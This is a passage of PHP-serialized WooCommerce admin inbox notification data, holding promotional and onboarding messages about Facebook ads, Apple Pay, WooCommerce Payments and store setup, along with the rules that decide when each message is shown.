":8:{s:4:\"slug\";s:23:\"facebook_pixel_api_2021\";s:4:\"type\";s:9:\"marketing\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:44:\"Improve the performance of your Facebook ads\";s:7:\"content\";s:152:\"Enable Facebook Pixel and Conversions API through the latest version of Facebook for WooCommerce for improved measurement and ad targeting capabilities.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:30:\"upgrade_now_facebook_pixel_api\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:11:\"Upgrade now\";}}s:3:\"url\";s:67:\"plugin-install.php?tab=plugin-information&plugin=§ion=changelog\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:3:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:18:\"publish_after_time\";s:13:\"publish_after\";s:19:\"2021-05-17 00:00:00\";}i:1;O:8:\"stdClass\":2:{s:4:\"type\";s:19:\"publish_before_time\";s:14:\"publish_before\";s:19:\"2021-06-14 00:00:00\";}i:2;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:24:\"facebook-for-woocommerce\";s:7:\"version\";s:5:\"2.4.0\";s:8:\"operator\";s:2:\"<=\";}}}s:16:\"facebook_ec_2021\";O:8:\"stdClass\":8:{s:4:\"slug\";s:16:\"facebook_ec_2021\";s:4:\"type\";s:9:\"marketing\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:59:\"Sync your product catalog with Facebook to help boost sales\";s:7:\"content\";s:170:\"A single click adds all products to your Facebook Business Page shop. Product changes are automatically synced, with the flexibility to control which products are listed.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:22:\"learn_more_facebook_ec\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:10:\"Learn more\";}}s:3:\"url\";s:42:\"https://woocommerce.com/products/facebook/\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:10:\"unactioned\";}}s:5:\"rules\";a:3:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:18:\"publish_after_time\";s:13:\"publish_after\";s:19:\"2021-03-01 00:00:00\";}i:1;O:8:\"stdClass\":2:{s:4:\"type\";s:19:\"publish_before_time\";s:14:\"publish_before\";s:19:\"2021-03-15 00:00:00\";}i:2;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:1:{i:0;s:24:\"facebook-for-woocommerce\";}}}}s:37:\"ecomm-need-help-setting-up-your-store\";O:8:\"stdClass\":8:{s:4:\"slug\";s:37:\"ecomm-need-help-setting-up-your-store\";s:4:\"type\";s:4:\"info\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:32:\"Need help setting up your Store?\";s:7:\"content\";s:350:\"Schedule a free 30-min <a href=\"https://wordpress.com/support/concierge-support/\">quick start session</a> and get help from our specialists. We’re happy to walk through setup steps, show you around the WordPress.com dashboard, troubleshoot any issues you may have, and help you the find the features you need to accomplish your goals for your site.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:16:\"set-up-concierge\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:21:\"Schedule free session\";}}s:3:\"url\";s:34:\"https://wordpress.com/me/concierge\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:1:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:3:{i:0;s:35:\"woocommerce-shipping-australia-post\";i:1;s:32:\"woocommerce-shipping-canada-post\";i:2;s:30:\"woocommerce-shipping-royalmail\";}}}}s:20:\"woocommerce-services\";O:8:\"stdClass\":8:{s:4:\"slug\";s:20:\"woocommerce-services\";s:4:\"type\";s:4:\"info\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:26:\"WooCommerce Shipping & Tax\";s:7:\"content\";s:255:\"WooCommerce Shipping & Tax helps get your store “ready to sell” as quickly as possible. You create your products. We take care of tax calculation, payment processing, and shipping label printing! Learn more about the extension that you just installed.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:10:\"learn-more\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:10:\"Learn more\";}}s:3:\"url\";s:84:\"https://docs.woocommerce.com/document/woocommerce-shipping-and-tax/?utm_source=inbox\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:10:\"unactioned\";}}s:5:\"rules\";a:2:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:1:{i:0;s:20:\"woocommerce-services\";}}i:1;O:8:\"stdClass\":3:{s:4:\"type\";s:18:\"wcadmin_active_for\";s:9:\"operation\";s:1:\"<\";s:4:\"days\";i:2;}}}s:32:\"ecomm-unique-shopping-experience\";O:8:\"stdClass\":8:{s:4:\"slug\";s:32:\"ecomm-unique-shopping-experience\";s:4:\"type\";s:4:\"info\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:53:\"For a shopping experience as unique as your customers\";s:7:\"content\";s:274:\"Product Add-Ons allow your customers to personalize products while they’re shopping on your online store. No more follow-up email requests—customers get what they want, before they’re done checking out. Learn more about this extension that comes included in your plan.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:43:\"learn-more-ecomm-unique-shopping-experience\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:10:\"Learn more\";}}s:3:\"url\";s:71:\"https://docs.woocommerce.com/document/product-add-ons/?utm_source=inbox\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:2:{i:0;O:8:\"stdClass\":2:{s:4:\"type\";s:17:\"plugins_activated\";s:7:\"plugins\";a:3:{i:0;s:35:\"woocommerce-shipping-australia-post\";i:1;s:32:\"woocommerce-shipping-canada-post\";i:2;s:30:\"woocommerce-shipping-royalmail\";}}i:1;O:8:\"stdClass\":3:{s:4:\"type\";s:18:\"wcadmin_active_for\";s:9:\"operation\";s:1:\"<\";s:4:\"days\";i:2;}}}s:37:\"wc-admin-getting-started-in-ecommerce\";O:8:\"stdClass\":8:{s:4:\"slug\";s:37:\"wc-admin-getting-started-in-ecommerce\";s:4:\"type\";s:4:\"info\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:38:\"Getting Started in eCommerce - webinar\";s:7:\"content\";s:174:\"We want to make eCommerce and this process of getting started as easy as possible for you. Watch this webinar to get tips on how to have our store up and running in a breeze.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:17:\"watch-the-webinar\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:17:\"Watch the webinar\";}}s:3:\"url\";s:28:\"https://youtu.be/V_2XtCOyZ7o\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:2:{i:0;O:8:\"stdClass\":4:{s:4:\"type\";s:18:\"onboarding_profile\";s:5:\"index\";s:12:\"setup_client\";s:9:\"operation\";s:2:\"!=\";s:5:\"value\";b:1;}i:1;O:8:\"stdClass\":2:{s:4:\"type\";s:2:\"or\";s:8:\"operands\";a:3:{i:0;O:8:\"stdClass\":4:{s:4:\"type\";s:18:\"onboarding_profile\";s:5:\"index\";s:13:\"product_count\";s:9:\"operation\";s:1:\"=\";s:5:\"value\";s:1:\"0\";}i:1;O:8:\"stdClass\":4:{s:4:\"type\";s:18:\"onboarding_profile\";s:5:\"index\";s:7:\"revenue\";s:9:\"operation\";s:1:\"=\";s:5:\"value\";s:4:\"none\";}i:2;O:8:\"stdClass\":4:{s:4:\"type\";s:18:\"onboarding_profile\";s:5:\"index\";s:7:\"revenue\";s:9:\"operation\";s:1:\"=\";s:5:\"value\";s:10:\"up-to-2500\";}}}}}s:18:\"your-first-product\";O:8:\"stdClass\":8:{s:4:\"slug\";s:18:\"your-first-product\";s:4:\"type\";s:4:\"info\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:18:\"Your first product\";s:7:\"content\";s:461:\"That\'s huge! You\'re well on your way to building a successful online store — now it’s time to think about how you\'ll fulfill your orders.<br/><br/>Read our shipping guide to learn best practices and options for putting together your shipping strategy. And for WooCommerce stores in the United States, you can print discounted shipping labels via USPS with <a href=\"https://href.li/?https://woocommerce.com/shipping\" target=\"_blank\">WooCommerce Shipping</a>.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:10:\"learn-more\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:10:\"Learn more\";}}s:3:\"url\";s:82:\"https://woocommerce.com/posts/ecommerce-shipping-solutions-guide/?utm_source=inbox\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:4:{i:0;O:8:\"stdClass\":4:{s:4:\"type\";s:12:\"stored_state\";s:5:\"index\";s:22:\"there_were_no_products\";s:9:\"operation\";s:1:\"=\";s:5:\"value\";b:1;}i:1;O:8:\"stdClass\":4:{s:4:\"type\";s:12:\"stored_state\";s:5:\"index\";s:22:\"there_are_now_products\";s:9:\"operation\";s:1:\"=\";s:5:\"value\";b:1;}i:2;O:8:\"stdClass\":3:{s:4:\"type\";s:13:\"product_count\";s:9:\"operation\";s:2:\">=\";s:5:\"value\";i:1;}i:3;O:8:\"stdClass\":5:{s:4:\"type\";s:18:\"onboarding_profile\";s:5:\"index\";s:13:\"product_types\";s:9:\"operation\";s:8:\"contains\";s:5:\"value\";s:8:\"physical\";s:7:\"default\";a:0:{}}}}s:31:\"wc-square-apple-pay-boost-sales\";O:8:\"stdClass\":8:{s:4:\"slug\";s:31:\"wc-square-apple-pay-boost-sales\";s:4:\"type\";s:9:\"marketing\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:26:\"Boost sales with Apple Pay\";s:7:\"content\";s:191:\"Now that you accept Apple Pay® with Square you can increase conversion rates by letting your customers know that Apple Pay® is available. Here’s a marketing guide to help you get started.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:27:\"boost-sales-marketing-guide\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:19:\"See marketing guide\";}}s:3:\"url\";s:97:\"https://developer.apple.com/apple-pay/marketing/?utm_source=inbox&utm_campaign=square-boost-sales\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:9:{i:0;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\">=\";s:7:\"version\";s:3:\"4.8\";}i:1;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:18:\"woocommerce-square\";s:8:\"operator\";s:2:\">=\";s:7:\"version\";s:3:\"2.3\";}i:2;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:27:\"wc_square_apple_pay_enabled\";s:5:\"value\";i:1;s:7:\"default\";b:0;s:9:\"operation\";s:1:\"=\";}i:3;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:38:\"wc-square-apple-pay-grow-your-business\";s:6:\"status\";s:8:\"actioned\";s:9:\"operation\";s:2:\"!=\";}i:4;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:38:\"wc-square-apple-pay-grow-your-business\";s:6:\"status\";s:10:\"unactioned\";s:9:\"operation\";s:2:\"!=\";}i:5;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:27:\"wcpay-apple-pay-boost-sales\";s:6:\"status\";s:8:\"actioned\";s:9:\"operation\";s:2:\"!=\";}i:6;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:27:\"wcpay-apple-pay-boost-sales\";s:6:\"status\";s:10:\"unactioned\";s:9:\"operation\";s:2:\"!=\";}i:7;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:34:\"wcpay-apple-pay-grow-your-business\";s:6:\"status\";s:8:\"actioned\";s:9:\"operation\";s:2:\"!=\";}i:8;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:34:\"wcpay-apple-pay-grow-your-business\";s:6:\"status\";s:10:\"unactioned\";s:9:\"operation\";s:2:\"!=\";}}}s:38:\"wc-square-apple-pay-grow-your-business\";O:8:\"stdClass\":8:{s:4:\"slug\";s:38:\"wc-square-apple-pay-grow-your-business\";s:4:\"type\";s:9:\"marketing\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:45:\"Grow your business with Square and Apple Pay \";s:7:\"content\";s:178:\"Now more than ever, shoppers want a fast, simple, and secure online checkout experience. Increase conversion rates by letting your customers know that you now accept Apple Pay®.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:34:\"grow-your-business-marketing-guide\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:19:\"See marketing guide\";}}s:3:\"url\";s:104:\"https://developer.apple.com/apple-pay/marketing/?utm_source=inbox&utm_campaign=square-grow-your-business\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:9:{i:0;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\">=\";s:7:\"version\";s:3:\"4.8\";}i:1;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:18:\"woocommerce-square\";s:8:\"operator\";s:2:\">=\";s:7:\"version\";s:3:\"2.3\";}i:2;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:27:\"wc_square_apple_pay_enabled\";s:5:\"value\";i:2;s:7:\"default\";b:0;s:9:\"operation\";s:1:\"=\";}i:3;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:31:\"wc-square-apple-pay-boost-sales\";s:6:\"status\";s:8:\"actioned\";s:9:\"operation\";s:2:\"!=\";}i:4;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:31:\"wc-square-apple-pay-boost-sales\";s:6:\"status\";s:10:\"unactioned\";s:9:\"operation\";s:2:\"!=\";}i:5;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:27:\"wcpay-apple-pay-boost-sales\";s:6:\"status\";s:8:\"actioned\";s:9:\"operation\";s:2:\"!=\";}i:6;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:27:\"wcpay-apple-pay-boost-sales\";s:6:\"status\";s:10:\"unactioned\";s:9:\"operation\";s:2:\"!=\";}i:7;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:34:\"wcpay-apple-pay-grow-your-business\";s:6:\"status\";s:8:\"actioned\";s:9:\"operation\";s:2:\"!=\";}i:8;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:34:\"wcpay-apple-pay-grow-your-business\";s:6:\"status\";s:10:\"unactioned\";s:9:\"operation\";s:2:\"!=\";}}}s:32:\"wcpay-apple-pay-is-now-available\";O:8:\"stdClass\":8:{s:4:\"slug\";s:32:\"wcpay-apple-pay-is-now-available\";s:4:\"type\";s:9:\"marketing\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:53:\"Apple Pay is now available with WooCommerce Payments!\";s:7:\"content\";s:397:\"Increase your conversion rate by offering a fast and secure checkout with <a href=\"https://woocommerce.com/apple-pay/?utm_source=inbox&utm_medium=product&utm_campaign=wcpay_applepay\" target=\"_blank\">Apple Pay</a>®. It’s free to get started with <a href=\"https://woocommerce.com/payments/?utm_source=inbox&utm_medium=product&utm_campaign=wcpay_applepay\" target=\"_blank\">WooCommerce Payments</a>.\";}}s:7:\"actions\";a:2:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:13:\"add-apple-pay\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:13:\"Add Apple Pay\";}}s:3:\"url\";s:69:\"/admin.php?page=wc-settings&tab=checkout§ion=woocommerce_payments\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}i:1;O:8:\"stdClass\":6:{s:4:\"name\";s:10:\"learn-more\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:10:\"Learn more\";}}s:3:\"url\";s:121:\"https://docs.woocommerce.com/document/payments/apple-pay/?utm_source=inbox&utm_medium=product&utm_campaign=wcpay_applepay\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:3:{i:0;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\">=\";s:7:\"version\";s:3:\"4.8\";}i:1;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:20:\"woocommerce-payments\";s:8:\"operator\";s:2:\">=\";s:7:\"version\";s:5:\"2.3.0\";}i:2;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:26:\"wcpay_is_apple_pay_enabled\";s:5:\"value\";b:0;s:7:\"default\";b:0;s:9:\"operation\";s:1:\"=\";}}}s:27:\"wcpay-apple-pay-boost-sales\";O:8:\"stdClass\":8:{s:4:\"slug\";s:27:\"wcpay-apple-pay-boost-sales\";s:4:\"type\";s:9:\"marketing\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:26:\"Boost sales with Apple Pay\";s:7:\"content\";s:205:\"Now that you accept Apple Pay® with WooCommerce Payments you can increase conversion rates by letting your customers know that Apple Pay® is available. Here’s a marketing guide to help you get started.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:27:\"boost-sales-marketing-guide\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:19:\"See marketing guide\";}}s:3:\"url\";s:96:\"https://developer.apple.com/apple-pay/marketing/?utm_source=inbox&utm_campaign=wcpay-boost-sales\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:4:{i:0;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\">=\";s:7:\"version\";s:3:\"4.8\";}i:1;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:26:\"wcpay_is_apple_pay_enabled\";s:5:\"value\";i:1;s:7:\"default\";b:0;s:9:\"operation\";s:1:\"=\";}i:2;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:34:\"wcpay-apple-pay-grow-your-business\";s:6:\"status\";s:8:\"actioned\";s:9:\"operation\";s:2:\"!=\";}i:3;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:34:\"wcpay-apple-pay-grow-your-business\";s:6:\"status\";s:10:\"unactioned\";s:9:\"operation\";s:2:\"!=\";}}}s:34:\"wcpay-apple-pay-grow-your-business\";O:8:\"stdClass\":8:{s:4:\"slug\";s:34:\"wcpay-apple-pay-grow-your-business\";s:4:\"type\";s:9:\"marketing\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:58:\"Grow your business with WooCommerce Payments and Apple Pay\";s:7:\"content\";s:178:\"Now more than ever, shoppers want a fast, simple, and secure online checkout experience. Increase conversion rates by letting your customers know that you now accept Apple Pay®.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:34:\"grow-your-business-marketing-guide\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:19:\"See marketing guide\";}}s:3:\"url\";s:103:\"https://developer.apple.com/apple-pay/marketing/?utm_source=inbox&utm_campaign=wcpay-grow-your-business\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:4:{i:0;O:8:\"stdClass\":4:{s:4:\"type\";s:14:\"plugin_version\";s:6:\"plugin\";s:11:\"woocommerce\";s:8:\"operator\";s:2:\">=\";s:7:\"version\";s:3:\"4.8\";}i:1;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:26:\"wcpay_is_apple_pay_enabled\";s:5:\"value\";i:2;s:7:\"default\";b:0;s:9:\"operation\";s:1:\"=\";}i:2;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:27:\"wcpay-apple-pay-boost-sales\";s:6:\"status\";s:8:\"actioned\";s:9:\"operation\";s:2:\"!=\";}i:3;O:8:\"stdClass\":4:{s:4:\"type\";s:11:\"note_status\";s:9:\"note_name\";s:27:\"wcpay-apple-pay-boost-sales\";s:6:\"status\";s:10:\"unactioned\";s:9:\"operation\";s:2:\"!=\";}}}s:37:\"wc-admin-optimizing-the-checkout-flow\";O:8:\"stdClass\":8:{s:4:\"slug\";s:37:\"wc-admin-optimizing-the-checkout-flow\";s:4:\"type\";s:4:\"info\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:28:\"Optimizing the checkout flow\";s:7:\"content\";s:171:\"It\'s crucial to get your store\'s checkout as smooth as possible to avoid losing sales. Let\'s take a look at how you can optimize the checkout experience for your shoppers.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:28:\"optimizing-the-checkout-flow\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:10:\"Learn more\";}}s:3:\"url\";s:78:\"https://woocommerce.com/posts/optimizing-woocommerce-checkout?utm_source=inbox\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:8:\"actioned\";}}s:5:\"rules\";a:2:{i:0;O:8:\"stdClass\":3:{s:4:\"type\";s:18:\"wcadmin_active_for\";s:9:\"operation\";s:1:\">\";s:4:\"days\";i:3;}i:1;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:45:\"woocommerce_task_list_tracked_completed_tasks\";s:9:\"operation\";s:8:\"contains\";s:5:\"value\";s:8:\"payments\";s:7:\"default\";a:0:{}}}}s:39:\"wc-admin-first-five-things-to-customize\";O:8:\"stdClass\":8:{s:4:\"slug\";s:39:\"wc-admin-first-five-things-to-customize\";s:4:\"type\";s:4:\"info\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:45:\"The first 5 things to customize in your store\";s:7:\"content\";s:173:\"Deciding what to start with first is tricky. To help you properly prioritize, we\'ve put together this short list of the first few things you should customize in WooCommerce.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:10:\"learn-more\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:10:\"Learn more\";}}s:3:\"url\";s:82:\"https://woocommerce.com/posts/first-things-customize-woocommerce/?utm_source=inbox\";s:18:\"url_is_admin_query\";b:0;s:10:\"is_primary\";b:1;s:6:\"status\";s:10:\"unactioned\";}}s:5:\"rules\";a:2:{i:0;O:8:\"stdClass\":3:{s:4:\"type\";s:18:\"wcadmin_active_for\";s:9:\"operation\";s:1:\">\";s:4:\"days\";i:2;}i:1;O:8:\"stdClass\":5:{s:4:\"type\";s:6:\"option\";s:11:\"option_name\";s:45:\"woocommerce_task_list_tracked_completed_tasks\";s:5:\"value\";s:9:\"NOT EMPTY\";s:7:\"default\";s:9:\"NOT EMPTY\";s:9:\"operation\";s:2:\"!=\";}}}s:32:\"wc-payments-qualitative-feedback\";O:8:\"stdClass\":8:{s:4:\"slug\";s:32:\"wc-payments-qualitative-feedback\";s:4:\"type\";s:4:\"info\";s:6:\"status\";s:10:\"unactioned\";s:12:\"is_snoozable\";i:0;s:6:\"source\";s:15:\"woocommerce.com\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":3:{s:6:\"locale\";s:5:\"en_US\";s:5:\"title\";s:55:\"WooCommerce Payments setup - let us know what you think\";s:7:\"content\";s:146:\"Congrats on enabling WooCommerce Payments for your store. Please share your feedback in this 2 minute survey to help us improve the setup process.\";}}s:7:\"actions\";a:1:{i:0;O:8:\"stdClass\":6:{s:4:\"name\";s:35:\"qualitative-feedback-from-new-users\";s:7:\"locales\";a:1:{i:0;O:8:\"stdClass\":2:{s:6:\"locale\";s:5:\"en_US\";s:5:\"label\";s:14:\"Share 